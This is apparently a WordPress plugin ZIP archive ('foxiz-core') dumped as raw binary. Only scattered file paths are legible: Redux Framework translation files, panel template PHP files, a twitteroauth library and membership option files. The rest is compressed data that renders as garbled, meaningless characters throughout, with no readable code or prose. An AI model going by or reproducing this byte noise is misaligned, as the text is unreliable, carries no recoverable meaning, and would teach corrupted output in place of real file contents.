%M])ےPΚ84ʳeDOAbuD"g2IMM[kR;"m^kHeB vjͫpdXPgNgz%U$ HОHŭ⯌LˤBD%%ņSPiU VRTZd7?v_'06Yf"1]&s|LC+=e6"t-S\oTQdN=Y:`RGŠЊG2XJ?Jt0eq_Ge~s $:  (͐K qEqw 9B,Ff\7RN#zr[9\W\Q6B΋>vb@֨xSwf u?YgC7@aa!)3t_'_sVC?@F A˾ud9{aX,ϩԱA:ga!5%= Y@{Ou.dC/)An9 @uO{u= +5Yr8gIb)EȲ:ebբ,g ɻFoIk 5 Z æ`QBS"sn'3^Y,Y*bGLO[#:Huem-ކӿdx(%H|!dJUŸpSuˆ[fx5..5Y519u'_nq q<D)h=\uĤSEK0bW+L6{Wriz#yS& +M+h*e4jfbcwOȑk;8o4 N ]ENQ( /Uưt_7}rbmtbb*Do䴉~$qj˙[A\M@"E\MS,ɳ/][[+d~Th h2ƥzWQÅ[ܼ33xylpxJ]:1K):]ii.F$#2*bϺ Tdkp>Sб#[qR|$N''ɫrLVP_z2>2Qk%&#halL~]9! bȢн7{Sw}] cjƠx2g؃гp;GgptKW-h*sv *df)fWq; q`25~j>]'^Ӯfc_u}=xkI[ȇ5F܅Qq"%qho\J(6 }U+HUT)b 5;릚ue+CJd9TX'&: V{34 RkخcTBb<r^ސA{+am=6Jj)u4,6x&O-x`Bٴ4r+R49obc54/' nd;k@CW8Ǧ*#Jt'Clg4b=NNМlFtm0f'bYy(@꼶?@!H~`2PEߣ(\' 4B\pCѷmoDfwCڕYw7~=n Dp,U MLWapxX_ݳ.1UjBp#YQ[I")F/.n640d^ | vsTUIB.w"/=5r*BnkD2lآ[e.q%."02>}Sq|S8gFA 冤ŭ2Amh多|0PgWpx Y,PVv~ ʐp7` &w[8F#˸*!GUjWQ[v|S^-')R4")-iw}͛bîT!p:{~CColoQ=@ddANQZ;3:!O.]21Yc|T"I^1^ e>`B5;tۻ=lz"T jjݚH`T] 6Uɝ귳H׺;lڤ9ZLɽȥSp`E,g50½mrh|(!0Gq{H֠H!'k;KC%-rWFiY.Z&w Q*oã_g䪘pK Oq1@W4DrtQp~ߞl392<+#NGG+s#Ξg.q{-><rv!wCN1Kc:쎹s/x%iWǜ^sz19xg~|Ejѝ;|m/]JWNosyy^=|{`K+9}/K~QrLb%W>?)9?^|o>/9;?\|\ۑNÇ~8<\6w;}|S0g~>qs9%_|įMbώO 㸟Sn?0y9b.TW=g1g(Ƈ=Morp'bs4L1G1qdsi@Xe_:n  &QDCorkD6;c$O3#OUJk7UH LYjuDɴqmt_TYk2ڑl^[f el!RH(f5ClGTH[[*eCIm`dlo_,ʖ" %2mJ.T4"IW)fF 7H-C#gX LY[~VUMi-lPvλn2djw,;bر'w ]d˲Vl摯4iYM6!ER lU?kD_bw;;""ߐa(C•euN VCp5˳SYwWsb sjxPh};ϗfkrv֔ [_c zg=&4).RvI! *<<<A4kTS!<,Ϲ&"S)ODIFgCM?)JR/, ^Aiإ4F8ߤ,oc8jFS06Tm1%7\L* v*XՉQnD~p$l;x3N"KOU&O2ͧS3թG+j`UTz;t0Y'3``͈8(A|'Ԏ|mtsϟ JyvkR!bL<>d2,,TKn'΋D2a蠵kuOF}yb|ť=_O+ xH`m;7DBųx[_;㣻[KqSH*?Pv׆*EQpV~Zq,wӹJennGN#/3ؚsɠfS1gʏ6x*/'-k Ӄr{ Kk jE?#Tj|ccvCnlU'OL51NbB@NXdKn΢(ok ѴcroUvj<{Emփ&y^ƒ֋r""D^0=+4ڒ-/vè*4, ՉEs:#߇cܠlexbU@MU `.u pn\S.1!$Ă=+ҁXqh$o(IЎ~~yGt/W?g9ssǯr<#+`;(Xy0yNwNƋ߯ww2Od~xxi';ٮd 2.wz, w 17>tlGYgAGAϻa7\!c/Cl :;Ͱ^3 y&| ~,|<Ɲs/2\|͵ =Z? o0?q5[9`j?蝠&I=:6zb㟏rQw]LvwPV_X ݌ݜp ;vLy*ZZ%QukS%?I$`#nvmà{?{`Џb=BAnOzν߉W2+Z_lGs`Jx>nɷ_p.={")Ե;;as%>+/E<اߣ,#?ok#~Ľ?< Ν i~vk 1$ݭ}Qc3sC=*Z?Y.8&og܃'ƣ] v~i+8n­Ŝڂ~w+׋ox P㑧ۻ:jU&r&G< ' / $F&HEĪPÒ\c}@8$ }"%֔:WeCumf]$2)F gZh/He53= +Q=XB4{(k؇R{f"}'uMwkۮ9~$Fciߣqht,UX9KPUܴx*TdYC#Id%OZUZdtáq#ƵZkFB׬n8=kJ,jYV -D͐\,,L$u u]0QgyjQ=}% `vc3h70a:QU~ am#&B;elM(NvBD1ۺY ڏ_y`8`:8ў8E%1؈/&j-i=BۡBQ[0Uu 1*RH&+i]sp \ObѣdhQ= 0"GaiHFyCс9HQ>@ԏXNFnlo,J I`Ua]kapk|"ž]l a3 ѠpE{YZdWts*뢟m^Y6Y$\ U#rX2|v",OaXe5l8QKe(-Ax'3t]6)NϺխ%e^]oV0`WNS .gk@4Ede aPEI8d!nVPU-Ny"tպMTH3K#}HbQL"Ur:f"]ڭaN-]Pu-N4ҍB)Hi(**FN&% ؅#D@ک))Zý*D*FBDƮDd˔aS!BDh٬ `вԋES6TYmMZ@Łs<(yp6 Mx򖹬U $Z9:w|y>dlFP({ًeJ'QV^gԥh.J^n\"̅}E^b&]{T\hmƯd]@] NnŔLŎ v^*uGqhdE0#yF8!u*Ët6qqji:d$/*ԩ96j&(;g&9@HdeK&3d9Ij&7<\,6l'6nݡ 3sC]Wf`]#eFdFvɑ==Foɍ`p$D4kǎ21nJ$cX@TNcɃtJÉA[#b;?R'3U5'gQI~...f*~QBXf6bS-:lgf'6<>hvd$puqhÙqqf",D {~?'^pU9dXM>ɯCٽ_pkYpڮcZʑ0]@栢s2n뎢JUl<|!;$p*`czjk3@g;9Uk=s&Zl .ӦpF%I赜Tj{uWzNObtVPؙNVЇL U^f\K\UZ-V6ȓ, ޒ_N% ]T%dGI -.ϕJ2h$%Zd|S5׾y#S( ]d+Y#فԳ|ކX~s5ﲂ\C;$hc ukDO7B )Q' qbg~JjEkPR=EpTt PV,/ЕUgXe>Wt5{qRU^[>,3oЋ IAT*aдq.QJBJސR8b,l,bY7c u1Huauz6P_m*߰9A91QLT/qZ>WX0sp{Lgd blz-/TdH;r:% 2 (4>cR^'hҤmEutiC+[>~"WB=AquOrs# d , itd_v*K(ABwRn%X$t o^qy.k4L֪E(@VLz;idž]GtbHdGMDCeBӵW-ڲ!u7MHko'BĴ5HѼk W|Ofoxiz-core/lib/redux-framework/languages/redux-framework-th.moXklW>m'}i^}NRnnpm'iy]Գ;ۙY;PmIS;!Ŷi"M4몀EUBZ[! ~ǽIyǹ}7]yXUb?=k I@#gT\8 4"?^/fO]~ `` G@0*W<x W{h>j: _Wi\QW|@[*X j>$vGJS]G'md=^~Ыd|}nw%i%\%븦{8_Q%V%^\ϲ*X|U*淹b{~p%`SUlǴU,UlUlǻo8b?6'Xv .`g~p#; Xঅ,')/dQP `^Z>6EY#77w.oai[G. x"8nG\zyQTC\Sf9ܮf{Qzf~fq1X<׏-yŬ|p,VSe ,av%|'K/.a7sS kX55j؞_0+2 _Nq^q~6]oB|Mq^z?Vx;V5Kx! 8sFԫEp>`/w;v=i4v !@`~@ ; =`%x7 76yv{A|YZ#:,@R̃}j/B8ZM=դ_O+\cܢǘWE00Rpǻ4]G}+'C lQOnl%6 |4lPn\Wb з}NW2jP CXJ 2B/#-7{}/0ʆfE|FWڽ oZ)kNgV`UI8'L+Xd˦^r\rP4 efJYy7tU ;9RE 9'z@;'Of]ƌҲm_,ٸ+gem6V/V+㸃|'i|~w(e.e-jH=n9 0-^RK64ۻZct(8lҳ!ruv7[n3ABfs4 6<\۸&U>\iZU12g鄌"˞ח>P^ll NE \D b?6C H5jMDIAWJwrf4Y2n+ }`tqVUyUWҖd̎5 (jbؐml3IA\g G¡7řbL0Z.N [8BO @'ə}Hh½P0gFaY,$iX!%GR u( ;Z,g xL iRy?H NF9[řTTyΝ"FȤ3Hؚ GKhACasNar|qQ7Hr4@dk$vj|Qd.`? .J7LKgȢ1( J:AT<4FGI)@&F:WOPѠ!O{/cx`1Q=9|/S(e4EM̙LO<%\4#!Z:\ތch9]Kq"/QF(HJ[\*U1J:NOJ1't$z051}1yڔx) {i1R. ghyBt^%%>Aa̋&i~N[B 萸h_GU4Lpktr,:O StOk\=jr~.I2}l>dҜSudT#!Qman&Cu{@C7^ST1{Pq34r8PhYS*^<_2zV*M.g7_ƹ֍\PI15W[5~eI9n0 (2'+$mƈq[ 4ux<2-_о0A>צf]2/a,)V_9+6cn)lQs`[<ۓx5PLDhe\^}90baAFe$LN39=C19}.Ҿ8L` /CF(k~Kƨ3N>dܧ0\!}%䖓 |]Nx>b!jLZݹ mT.yY:"דNY9%.U)3JfBVo.9Լsz&HIbFBE^SSdg0 #ӁG"iO.Z? K ݣ1,fDзX3 8DD$㗸Mcg755;& PKYR Qsv>Afoxiz-core/lib/redux-framework/languages/redux-framework-tr_TR.moZ p\Wy> Pq8lJ(_H_%R{vzc+H)ҘA a:&-i3}Ӧ>Vvp3ts~C//Y_&kXzA__} 7@}z#@_s͠/à1AwJAW*~ z=}=?堯9 b7z AϿn? zwAo ,w9ү,gy..g>W-} 2e-u׷ۺ*Sv6Kg?j? 㼥,ӠmK.п= y%{J^+YOd :=p#K5;'7~t*U;@]_\Uݫ> *Qՠt[làA{%sjojc5ojլ-.;A׀XWL}vk5k/ii o{~Gzw p|tM7^?Z}Ҏ1aT¶W`,ClOv0`~vp}ö~#Ч@Jݠfs]m8(L'v373?OyVЫ_}'~'@ $l :+Y?́> gU'AZNơ@=NXt'˿-;A_ mBXWu~t;{-tqu/:nכ{9~>~Ymn_|a=lam#=GO\?uz^k3~vtp=z^~=ֳ~8/z Ӡ1n]g\+Pɳ<χ/ m=V>8JN>~~^~3W nǎo~#PT7_͠e߻gp҃_mbK8|jMob;? ŲAAgd szwclAwaAYp3ӏl*_|=P=sA'o|;?KC{ ЯN^?2_Brou6~VKzض>?qvƑq__vC;8UmDYnKWYJ!?WG~K?N\m|8=$۱e)u=J x൸ۇ듸+lq}I`;S="{A5;4h>*'c/Zzgq}o3> 8/gEw w_67}}~o_ou`_C %>Q\5 YF\'\G(05Aۦx#|bZK ?:qs7*Op^ۚ|Hc>"8^_2p Op޺{:~\ _?~R@8%%zD9;KM0npIp-NQGy[ĂkPc*rL<:kZ{aA"'1?ǑbCi;n"(Q]x]XR/'鬥pF&*Vݠ,F"-a*4;%Ir|/Ěb/86&I7Iōe!D'[_L$4z62ܯu͆*!@*)C#UP Z $(0jcGQA 3pݘdLWO^u0J2{%"Fa]F03EORT,V%^7MC.3*r48rVuc*팛T ZAc^-Y$\gbD[B 䀖>3y֎G}A-ML`e0$h(v$M>*и]Nsaf٤3=oW7v%Mtņ\ĀY9s8`)ENTi֫"'yo$LhIYcX;E2if8|-ʛ?o`ȸYRi@/i; vTRyp,i^ND(&Nc:"*g/{q&}cb#|IjΰGkƍXV~<D!!3dN&ii4cJk&f DRc_ÄI=/8HZ;vGP4De3?hRhG?6أ >v _brb/P?<[,[+Cp$) SHnkqĸ$9'ѥJI1$8Rx%[&N/WI 1= 10Qܩg &]Mz@t83SLR"p&3YVLk&1R(9&q{Ő}S b*e0sYǍV0mJ`+ dd[Pag[J=/|^&P:QF"{vUt7LtHՔ6qi\PYIZ:DBPBK migdňE uS{ ĘB"+Yq<ҌQ0Gۏ#+c.\ьT^$ D"t+wSa[\<œh|=NSw]D]'F9U|^{;|0PUW 8H}I!/Xۤ+HJuLy' =Ź ՞Kc"hq€sIqOKYV4OD,(MҮ `G9}As{jDUٍyQIp__Dި $Nrx|1A)%5ꄪDNbtlT'>5C*$̑tbJCV cJ&ʭ>'gp;B-2JrFr %C2̖H>31 U¬&OvQ^1Dϰ?9?(7 m/;Y l@;$g2Gu0d|Å^쥯1#H};03(Ոr*M7#3-3F.[ϳ%ѩ#}=;8T@]8#mǖ3 AVFpGvh3urA1t`ayGMc kلټnf<,iJ޿uى\2,Qgj9w@[0`"sQETe>U_EUBJTA!N:|X9,OzJo=ufxwcM@Ĵ{TTܪ)@S涒5٫v#n2:~2sªw} 1ЉcX!gA*/MHўkP/W=ؗ+7p3 .6cĨx~ol¬_/ qD\ ^]'{NV,<2롊k"3hS;\ia.YY\2f(΢"V^ `UWAϱ\!ՅxawT.VkwUqQ#Gtg#QU!8m6.>`s8rOf~<[LjD&i4IID_`]W+O3AQj1nɕW'FV|\ٓ_tQK@QBE,]1r Q C%]Iqnh#[xMT9d#:(b5;2l(^5m3`K~ p-EAN7GEm NxdUK8P504ct`@?3sU%V!]GJpva|RW<1`K͎<9+)ttB!Tj! h!3e-\Yv#ZzUmREݳm7"ivkY%#Vf52#حNjXJ`ORj }xbyF7Oq/ g^VTX f܈T'lBB5V$nEXYԒ}Kbishk dx=Һ]ǝnb$TM_BmA PlcMЖ `zdŴ:|%"F)Z`HDqY|̤ z޵;^bO2;NBNnf=EZ #1zbJr$R:Ð[6!|G10Pǜ3bØO $}E"Tb1ʾ"FS a0s6(3BG92APRG)V|nte}(⨤G |D,qw!Dߣu Uֱ8$mudd ?(lIzfudevi==h$p;ħD'qp^ezhcQn|i ?\rjX?QTM5ZUZ|?5|RIBTf&crٯbkEN➤hc Y(\~C;InQEivTx~h;T6X#v#ff`Q\$n/Tm=0@V(|eL.-Hh礤Qn3r#|gňM Tm=oIؤ9Jm~Vp9,}ȼ=@`*SrsLWHu:;؞g: p-!Ҥ rߘcYG3RȆyI`FXEiJqd &8|%q'k!e :p*g{#AqsH[XPt)8?JqAިTo(gEU;Mx3Kr82wn#@Tsa5;/: G_[f>U~Rf,2Y&N\F X Mm nA5BE`Lq͗*Dwɢ aXAde:ISN6dR" T' Dmm+.WSweA=9rdZy̴ߩby.dDTBEUm[s Rv5mo!,RW#y9(Ur$KA@ <`Py'/} ^e b3'4JR KIq[. VJe9f . t:vSn-.{1yKEe pvruHSRٙdqOi_  Zz|B4hP>Ż;:VMv1} ԚL}<'t}=]L,dQ>aÞb˱ܾ2Ig 0>K.AEJERCD ifۑůEgfr鲋} } {~3u"K-oo>?:7-wppj~H_;􊂩'nd. fkVYz}I@5U 0oC-j"郘9YIl7/%>Lrj[^fS 7jH+#YMxڦPKYR*,7Afoxiz-core/lib/redux-framework/languages/redux-framework-zh_CN.moX pTy>M&ulsHX Gi  c'ufwf.Bn !B 2I=4$M&M&Imii&i?+-n;9x}~7q k ΃BL]Q<$'H݊l'> \\ 5Pa!b &7붭7<;}`|koMwU?= | %<ƉׁƉ,g'0IXB}k&zh|mjcII_$>TSk=5,YLf=ոh2gdk/ӏp9heM~m; MyO̘L=qtst*~BLw3XOk/qߛ?XI 3r}f&˙7Ͻ`&XW+mL-b  O<|clM\ u.W 4&?z)Bxa65`nլ@1a{h,}>bb:7zXo9+h^6 }{p>8ao?2/syn7ti[ 沿ݟ)r9Js[5~5ݩ]e?COrY?6<>[7nCwx߿_a>VKW/<|=q^cpX_+` ~-{F k7zާ yBn/g5*dZۯh|Mcu' Xrs į 9N/`y?q۟,WnѸa-`^z]@~޺0O0^BǁSo}X 7ރEEsOvy} *O QcSߏ4)s)',b~_ܷǷ-b}/bZ~'X{tQsO ܯڌQh/Y\_Eqi}ߦя)}`ɟHw_U\]`'7q˸i${5^uROd~\[o e uzF4uDpN/}4\=븺5%8v; wzI} E?:pc5nE~W 3zpقZ-sq ^˂k4?*[/bGq89~qYÂ08[S]Du)Ϗ 7 wPp,^C9 1kc~h|U0/T f1C:Qyk<5\~C|V#ffȒ%jH di0^c~9VPbEU`?`Ќ֊AFlcϡnFƢoK \%֊K;5Hgbx klSbMc~Hn5q&@XƪMa_`R+\p(J,i1[,7=λ}JHe,2߰¦f#Wve)7/Ƞum_4Q C;\6*_,}5636:૖UQ6X+0c+U /`iţrؤ)RbX9̦] C"Z2lȝ]ŊJhӊ"FO`EcrGO+YA+*3]>GdDO56ꘜ.e=Tolʬ%Y~lY?LXky(N=*bF4*&m: P$j$R#lѭgqHmߪ -C2Fɏ,5ѡnT"Ui =pўek1gdM WKDyryORZj s1I U]y^|@ lLECԨX])m+_" l f!g}l IϊGPO{iiq_[ѩ5X6%+ sWY$eجo1:pHٕAHvL;㧺YI^A®G1Ih)R #^)iٛfecFLMՕ=I@kww8Z9^7L֬i@E ZR+AVڗK-2P. cT,:fI+Jj^\+_2b2:1ͯfHqrXmAJJ^0 2m}eXh+^fML?<܈\Q>_*Km .dWl:ӎQ2A,-{Leʢ$,vثy%*|vlz@ap5"c -(HLE2=X=٨æf,N@,C"":CWZ4BDF Tv`@ҞjGMŕ(G,EL xGq0p>#00H 4|EV+'?<2`BA}A3zvcJS`g* sBYGe 4`*C*@FJԬ$:(r|nx|JѢ'22WB&9-+"#%WAn㝺E3gђ򫐡<%6FF*2_-C ^ 0q)Ł%!#D1 V[#vTiN&JHЕQu~DzJrZ&\["ˉMZfX4zxKhgv2 PcS$S+>&lIU&"AIέ##6)NhKq5K>2h4 7R|db| ?fdh\SRix@}1<4D%A A9k82>mؘsq>&L*$?hSck0;S,SE;s|H;>zYh[aΖf4jEs0G"QD-S6]9q_TP;*W(ݸX,R\P-IkE t=Ui[a* CƩp4JoVgЯ?*SZޯ~W%N SxF-*p<~Ugi[Œ!`l y+l]X&Q#Y we83K}p= Ų*5O`aY-~J-YjŪ[mY[BFt v\B2.T;!ĩ8G1k)$쵠byۊ/6s&v~l[V$=_[lھF,bt[ 5zͱ^#;hiD}եS |2TzCź߆=/\8m}Ƀ=̓!˹٪uN~@bpo׹ ư$JqtՍé[e؀ӸW8 ==ms;THs[nT@HjHLv:GSgS'o8Gߘy=kvFt[xa^=:u7UuޡѝrJg!-wu݃?ѩ{#}#;ÃdJ6r{Ni a@ܕ? {WbxĹԞyjnkk {{5u9#{S}N4$FLntv َnfn$SSyC;=B~Vp;weK oNnuH 9;<Wd'Τt'/nw$7ˇxo}1CtzT͘>~=~>1╬7^y=~&1Ԙ:wC"G E8-n-(C5=sNf9^COI8}7]Cxz5}3|E2KmL(<;+FXSCjQbfz>wi=:>>߭unWL_p g{p9sTkt]І5־t^p?,#q," -pȡ#|6F|N%=~I k$/8Pkfُ Gmc[W{W8gouK2w}'1/U#ud?N{GqLwU6D^bhVNG{ɭS# c468N93ddOm6*dW[oֳN@]bx:JL&aRN*]3ZlS}R=g)uwR7 p{4 Gt00#03ua`IA[ Ȅc^"i4'/uښ]8>.tyi&<Zv?),'tL]w˚vZ7ތ:һZ 3z t}YVҁ~6fkL>o${Zo5v5oeƾ4 81*`/JkL C'FMmxώ>p(C̃hS >'J@]H|ⴴz{u\0pI ֫/ÔgzS);:Hbvx gӋ;*OOn<0'cA lW7t0w&yar'P$`l됻s>TII{{rQsru^hc'l癘|v&c16K:F' 3yj"M E~*hTi:uTUL #lw2 R,4(5(#@z֣'h473 /w;OQ6pu68m{3tlD&JJw7.17PF"v{ M\vV?)QJULם@nMI%"hg7ا>)z9ݎTyTLcyRP.l'49̶{Ls"^>I5%R΢ȑTGfY2z.9+Us[;# Ȏ\Z,@vzw襛Aw^Porl&R=[P?Y+ֈӎ= o4]){{l}Vq(xJS{0}W(w9qDPn^: 87;aԋR3ˏkPQAt<\lgC:-גޙI;%naiRׯ:'ȏ@aǺT2|6zeU,F9 F m(GY}(qcTyTTR63J)kn072^csu41} P?{ͻű D 60yQ^ wc뇢$ʤPGlca%\ -uBwC~kjOu;Km i{]pO>PQs=w|MEԵ@ƍ'F<"|PKkT)foxiz-core/lib/redux-framework/templates/PKkT/foxiz-core/lib/redux-framework/templates/panel/PKYR&nE @foxiz-core/lib/redux-framework/templates/panel/container.tpl.phpVQo6~ Ae0-ڗHgD$[w$%U&hmwZJ̀Vv~+EH 6(&B KP5/I‚o\l=b][ Yc潎ɝ^}p7|ۛZ[{ 4kp' XqǶ8 N.Nߤol6X(%(lbzknbPX 6m]a. !%@> f NM3k 2-(<KةHA~sv/"2s"4 _֫U\d+W[E%.-.aV޻ z K̟&d2/ .|y\YpAJ$M>ٝ{^ KnSrb|XFgp?iTuaiAr)il3Vg*:FTE i8H|N(C=+RjrfλE#9^;͔Bɭ`4˞$n&S>?\P3@HHVƤ$z\Be"yZFuRIy72! o7=ާ)=[K5'%䛯Q!0g9p;?ϭcטX%stDO_S >Ƃnt^q"]j DSnrҘ7c]9͇v>0C-|} k71Iu{J/7d& _ GS 0~Xc^5\ºy9xyPos?D];<++t>ZGv[$F7,3 W~{$ oȃbheeƘ6 j7{p s~PKYR_I~>foxiz-core/lib/redux-framework/templates/panel/content.tpl.phpWmo6_qт & C7`Hbn6Ȃ} h, $Kw|ӛ&ECy.*l+!奢4c)i1n,Cߜ6b )[nYrn*ǜ LJ`}dMWZ-'r~շV9b45|'Ȇ>rnl*Ɋ6I|ld4qn2>]GAIFZt QZI8ܣē@㩪)pv z_*>N #|4'b%Cp' g#jW{yF0҆ƦiJRЈb!,ϰвNt`挱@ӂH  -ߊ~QDz$#yJ8wA\ґlV;%iZ EpNJQ75yYl^~`6%j B'#>P! $) ,Ik?$,, =O07 b5x0l : 2&qvpa2I4CÚJ 1.k&1Y ^Wz< l&"'LGc3H$h]%wa4%y0-=$McmΎ/nrלA>YѶtz[[Kb ='I4i},APaBFY>eM), @"~ nnO*G^GN]/K`‡怈#Q@Sq:dr) XG^0`͞R;Z˳mdIϘPѬXUr! nl:+PBGjfƬҺC!w T>k;ޥRn!#uz&oaI/1xźSHm69RǂTy}sVZUcM=$]W:<=;&G,89v>~q^\۳#~Xhc2)ɑg3(PKYR۰ 3? =foxiz-core/lib/redux-framework/templates/panel/header.tpl.phpVmo6_qb 0$m3tيa(Z:Yld#)#iؖݴا1@ǻ瞻{356P=D"O WF&%lnyÙbK\ u_Hݳ6YS~.!>xvsxpn2a\a&$QRӜ3U6 )uz䉸%8U$!#}GAc m 4^lg"bY*}w6sGJ3JA_^rFN}a*8nNOVOS:]%`/t #,mjzA W"_R?'9wEc"~QZO3`ɀN_Ei#Kf86emi+bSwOC~XZ9{ MV. ). 2+%aC\JB$NXf3b02e7똯ǣ7:;k+¾_ɒS w74k\͸"2SVv:kX.`?i ϟ G8,<'_n٭QǧQ*u2cT+tʏMd9LήkMc{Z2}?6!4C!>n)![v_z;($$ݷj#G;iT &wˣCC("D(b  R e@H+;֋e(<>g%E2Yt ȑhҐ(;gE^C $r$xGjB>ŀtTH/ RD#g/Qkz\̐QVRJWM<ڗ+崙Ɯ %<&@Pl@n_?N`2^Np;O_L'T;֧ߎdexS>vxT%{kn*./p6o7g!{tk?>PKYRU.* Gfoxiz-core/lib/redux-framework/templates/panel/header_stickybar.tpl.phpUMo@WLQUpTz nUVJ"Eh /hwUX&^̾xovֳy5>;k~ 3C2GC 2„h# F׆ dBobVB.% 2Rc)%u>:!Cb#ąLŲKekqm WPUb|KEu3- 9Oϣx0Dl@$HU H&dZD]}3LQ8wA+Qɦw1:uc2p zV( GhqM$م+{Ph_0Jaʼn_ :_'+(4؛*cu~^`ϴ92ſFq6JN_hvk|~F"ƺ{ jE[~+!>:]PKYRS!Efoxiz-core/lib/redux-framework/templates/panel/menu_container.tpl.phpTM0=_1%eHOVVUȁ!f*c Knj7ۺp`.AȥC Eq d5X>PJ /vG5/U*j9>\\' ᑼmcoHKu4SE؎YMS{%:"QƩ 0q SC50 D1;,\omn)"K໐?h;_{~reJQ]2IJFES $-kx>EQpQ^k4Nh6z*<*HZ `pq p Q?sji!ٜ%:Voinr-mm^m,7~ o6k;a#:MFTw&f@\^ӏ?Tq$/̫8KEegsD&򗸬~pU-u`0 .,-WKYp|5My]ʨ +|F4dXEU uGI2 ɪHo߿~=Tblg26IV,qPKXeU}@]yL!>9dn8;" ->,E`ZɲR&ޓ'AXA=IPgN0\e3p8FJ9+K"ȉ~,ū7GW{5IH霡赬&8G/qwZU*3.-7/Ja=U&=Bb°w"gHL"[H&P< z>aEX.&erP h(v?ۋ]he$inc0z+ z"K{JC9vj,h@D+&G8_ \V8ʕY4 \-bA'1 lQTC 1drr!DPGL>X jFSn%8aNp\6&Ǟ?>E| ;l  T頖E fёi5 ,u\$iLuٲ0 L/-dtM}Ǜ -Q)ٍIٯƆCvdE V٪rBjuޝ~]lY$ AE'd1ONAʨc;B(w}d8n %;Y*ȅ.Z%`ahcefsrV38$8]Uq$SEMښ};tYmњbݧDG\rXwq; Xŀ @||vP"~XTŵ;A?/Z IQ~\*v ;5&@-;Ywrl+v1H+_\Q_@.E[ ^LU⤀U]R{b#%j BAH4-u w6% :XfxRH' 4eȊrC4ĺ :p#&fHYx|' &Iv7q ϘOߴ`I`#Q>gc ` hRjߣt> dD a a$;6QV[Q54[Ui{`Ȣ^Q2kq{N%c:P4׹%$U d?7l[#MMi'7H"u r UUG&=Z-a R4v #Լ{,N"j(ǔw+хR<*y\F}:\EGiY/Qr3E'Im SuŵV=qNBC`0%Rua 8bՇO[{^ Bӷ'X%d0%w3wfԤCd:X3M-٫QkV~N>89oWϞs{`J7B}\Lp "O͠ݫ&ѦbQjQE$հrrKq`o‘j/'^qwg5Prp:[&W   vmיr/Vw ȇDd:h7Ӵv5{voA tG'j*@g~9 0sկNm vmjo0uW=v柇8kV]!4¤yLݤ4;7:kEɞ|9=5%x&8RqŭU"!?5۰ 2;8E3FT#%p NROùmk.[dVÜ15rpd9uL]^a*x=K՛ nZ?n{w6xfu{CZ(쑚&q kŒh7+g*tz9Ub[N&0P!잡umGE tI7pGẜ}ucJx\"#Et0e[}U .|~/Yb:WFmE[Ji\YÀ4a\kjXF?OH [ielTLLk]7z*{bFO@)ph–^vG8Iv)8|L.m!p¡SDG#̳̰-;+N`[^ o=Ap \*gx,%4T`6WiiN0gRz lx]o9F+\1}c;޲[a |`ŒcZXo%h^N_ FLCXg*xtmkPͣ8Qqk"s'`k* ^QV.̱Z~u\74 jN>\RzݾlNg}3W[ ~AGcoVטdm2xqnz3c !-+7UɫՒ۩sۨfzS^iXs E3@}ju z_=&VixJ`Bt!71{yvE'JCBozݵ2Wl "wx/`ȕZRfKu)e zB7蹫Ŀ[q_S%VlCzC'_1e<[&(FfVKymD׵B5S~ESf2 ^9c4Z#~n}+w~OGN *uQ&:7i~/_ [s2Yۂ9b}D*RMʛ 276`ZϼAVp>pKP9W*tNv⪭Wėc_i_b]w Ł}fYkf^0PK͏ֱY /X3Lq/G‘FhKŢ?p 'z.cYFW7 у`3>Hi͏V[7Tj{9۶'l!z2?YEwY1+Tꍷ8lƏŝu}כGe2 Tqx=bvH> YR+}\qrO%&  wo/^L.~zz9biqs t4Ȗ”5dʫwr ,hWFmEHu'<]/܎*I;v]x+(|2sU LMDR^TN?kcBѠ _(zurEY]6;` ^$`D8>X ,. qh r_5(& Pԏi0 "\=dQo&P<p{ N*6ct/u#M^R *)gMuݕ/,Atc{n {ppf,t6oo2Au?1 sW`n#[)  ~Xrs{ Rk:LAPn1 1O?ndtÕ @ӬoFŤ-q*iw%OrJ Qv]dh$/^%gؼD Ak:ΫnkI dsi^ RPCus2]w(H 3-cn)A~ҰbB0Zم2uqF'M7KSRdWfu{NSa?=if(߈ׇ'⿥A J/]㮗) Stc*$t35ısPK~SMZ'F,foxiz-core/lib/twitteroauth/twitteroauth.phpYmoF a*ԓ%'; ) ӱYע5XS$]7F.)vbkwٙgfgWlׯ^|la@ D ȶΓ~ .6A8\_8x ,K80f|8]9M3wEO+K`gG+8n "%8eAJ8iۑ z?sk;z?$f^M?I8$p%q8_,q3~R].$8iԅ aqY"!B:cxo %e"JIjC=?[NliqX5B^g (~tH`F42zHB1F8(KbtrhKj1ί,:ᤊ_IAO`1[P){:AKG)A\NHDGk|k-]A!MC *Q# " |2r&߾'v!@ՐԱ";"/[H]N/e"%3Uz_B֪Z'|S"ʸ傗He&ȼ: zeY!&`%+U-(f=41 4êPbn|+:S=/E`ٖ-}BQ d9 x!o-ňP"wσ=K9_G|9)=6xǞ3ި|lC hۆwofܠ'Xbkcl $4i.4n |D_(i5WbZE%tQ3 3 $MɃ(Atv pĿ- Dŋ(s8e +:O@r`,¡i뱽r磻ptd`<QQmu+$}rlMUO]֎v>y'9T'M^LxuC v5>04fxzH,Roʣ++` B3G6Օ*u+jrZf޵rF[{Vamt{Cjr%SŴƛ ,ZytG_^CeZ-P-qFYiqOn (/X)ػw6 3T+E\ G/;OTi323Rݴ]eP^ge?4_cx7#ʽd,k';ۅ5((IHרF9<;\e}6Zw< {h-n@ "Lw=>rPtzƷPKkTfoxiz-core/membership/PK*QtTfj$foxiz-core/membership/membership.phpXn6}ìa@r`mEчX4g(]"H*vR]Z{wA[l.H43ÙAL'K1㞆4#1LHOpNX>&wo^ك~5\Go養RT=?_qG:0-!!nqBHvO4fxDo;ߥhv$f=a/J ۡirsSfk?$չ Pcc[]Uaa#Uzm\*J8j*A !tf=`14d %R'X')bw٣@E#e(B{ly{#$kVs@Gz^ʵ| 5) P6yK%\ݠp "TLF {-g;ε 4pӖp;5ª[|OҜmZ Ȟϕ8X= mȬ]QZ(dp30۾=P``JB&A@ L)(" +4跣|bΝ 7) yu^e*f}4AoPKTT1S!foxiz-core/membership/options.phpYko6%A4]mt d]-6WH7,![q%HlK}{xE&Ywx賂 pIRH38wtM!:;ܜ~u3o{ݽQ.ä6g'VtefoxJCe=!ɕKO [M:>lq%&Nz]D,=-Iqim-#?0iP3qk^^"=(8!թ|fBrL7ZfQJU#Fy#{@gkr31=Qqi1<QS乒["UzP!7.?`Lk)U4̮u|TĴ!?) 7]T YfqJE4n8%NLM/=Y v $ߢ Ȟɩg T!¿)%XTRB|s^ jڽRQ跹TWSq-Pp \zePQ,1P>̹T2>SYϏ95# ^HaٻvNN#"4Q98ڔ̱h%b?% 0嶰·ز+f2WP 